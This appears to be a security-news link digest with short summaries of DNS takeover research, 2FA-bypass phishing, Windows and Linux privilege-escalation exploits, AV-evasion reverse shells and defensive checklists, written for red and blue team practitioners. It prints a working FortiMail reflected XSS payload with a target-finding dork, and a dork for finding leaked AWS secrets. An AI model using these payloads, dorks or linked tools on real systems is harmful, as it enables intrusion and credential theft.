DNS Abuse & Misconfiguration
The History of DNS Vulnerabilities and the Cloud
https://unit42.paloaltonetworks.com/dns-vulnerabilities/
Dangling Domains: Security Threats, Detection and Prevalence
https://unit42.paloaltonetworks.com/dangling-domains/
Fishing the AWS IP Pool for Dangling Domains
https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains
Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target
https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/
The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability in AWS, Google Cloud, Rackspace and Digital Ocean
https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via-a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/
The .io Error – Taking Control of All .io Domains With a Targeted Registration
https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/
The International Incident – Gaining Control of a .int Domain Name With DNS Trickery
https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/
Hostile Subdomain Takeover using Heroku/Github/Desk + more
https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/
Dangling DNS: Amazon EC2 IPs
https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state
Eliminating Dangling Elastic IP Takeovers with Ghostbuster
https://blog.assetnote.io/2022/02/13/dangling-eips/
Internet-Wide Analysis of Subdomain Takeovers
https://redhuntlabs.com/blog/project-resonance-wave-1.html
Subdomain Takeover
https://0xpatrik.com/subdomain-takeover-basics/
https://0xpatrik.com/subdomain-takeover-candidates/
https://0xpatrik.com/takeover-proofs/
https://0xpatrik.com/subdomain-takeover-ns/
https://0xpatrik.com/subdomain-takeover/
#dns #abuse #aws #elastic #subdomain #takeover
Bypass 2FA Using noVNC
Steal credentials and bypass 2FA by giving users remote access to your server via an HTML5 VNC client that has a browser running in kiosk mode.
https://mrd0x.com/bypass-2fa-using-novnc/
#2fa #bypass #novnc
Google Groups Dork
Some devs use "Google Groups" as a workplace because it is easy and free.
But a lot of sensitive information is leaked, such as "access keys", "aws secrets", etc.
Dork:
site:https://groups.google.com "COMPANY"
#osint #dorks #bugbounty
Bloodhound Custom Queries
A combination of custom cypher queries from various sources for BloodHound, added categories to match newest version of BH.
https://github.com/ZephrFish/Bloodhound-CustomQueries
#ad #azure #bloodhound #queries
PowerRunAsSystem
Run an application as SYSTEM with interactive system process support (active Windows session). This technique doesn't rely on any external tools and doesn't require a Microsoft service. It spawns an NT Authority\System process using the Microsoft Windows Task Scheduler, then upgrades it to an interactive system process using cool WinAPIs (run in the active Windows session).
https://github.com/DarkCoderSc/PowerRunAsSystem
#windows #powershell #runas
Container Security Checklist
Checklist for container security devsecops practices
https://github.com/krol3/container-security-checklist
#kubernetes #docker #security #cheatsheet #blueteam
Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062)
An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
PoC:
https://example/fmlurlsvc/?=&url=https%3A%2F%https://google.com%3CSvg%2Fonload%3Dalert(1)%3E
Payload:
https%3A%2F%https://google.com%3CSvg%2Fonload%3Dalert(1)%3E
Dork:
inurl:/fmlurlsvc/
#fortinet #fortimail #xss
KnockOutlook
KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements.
https://github.com/eksperience/KnockOutlook
#exchange #outlook #com #recon
Relaying Kerberos over DNS using krbrelayx and mitm6
New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services.
https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/
#ad #kerberos #relay #mitm6
Windows Event Log Evasion via Native APIs
Some native Windows API calls can be used to install services WITHOUT generating correlating entries in the event log. This was seen in Stuxnet.
https://www.inversecos.com/2022/03/windows-event-log-evasion-via-native.html
#edr #event #log #evasion
ntTraceControl — Powershell Event Tracing Toolbox
Want to simulate any ETW logs using powershell, even the security one?
Do you want to import any evtx files into the current eventlog session?
ntTraceControl is a set of Powershell commands to forge/generate Windows logs. Simply put, ntTraceControl supports Detection teams by simplifying the testing of detection use cases and alerts without using complex infrastructure, tools, or the testing of vulnerabilities.
https://github.com/airbus-cert/ntTraceControl
#etw #simulate #powershell #redteam #blueteam
CVE-2022-0995
This is my exploit for CVE-2022-0995, a heap out-of-bounds write in the watch_queue Linux kernel component.
It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
The exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely.
https://github.com/Bonfee/CVE-2022-0995
#linux #lpe #exploit #cve
CVE-2022-27666
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
Research:
https://etenal.me/archives/1825
Exploit:
https://github.com/plummm/CVE-2022-27666
#ubuntu #lpe #linux
PSSW100AVB
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1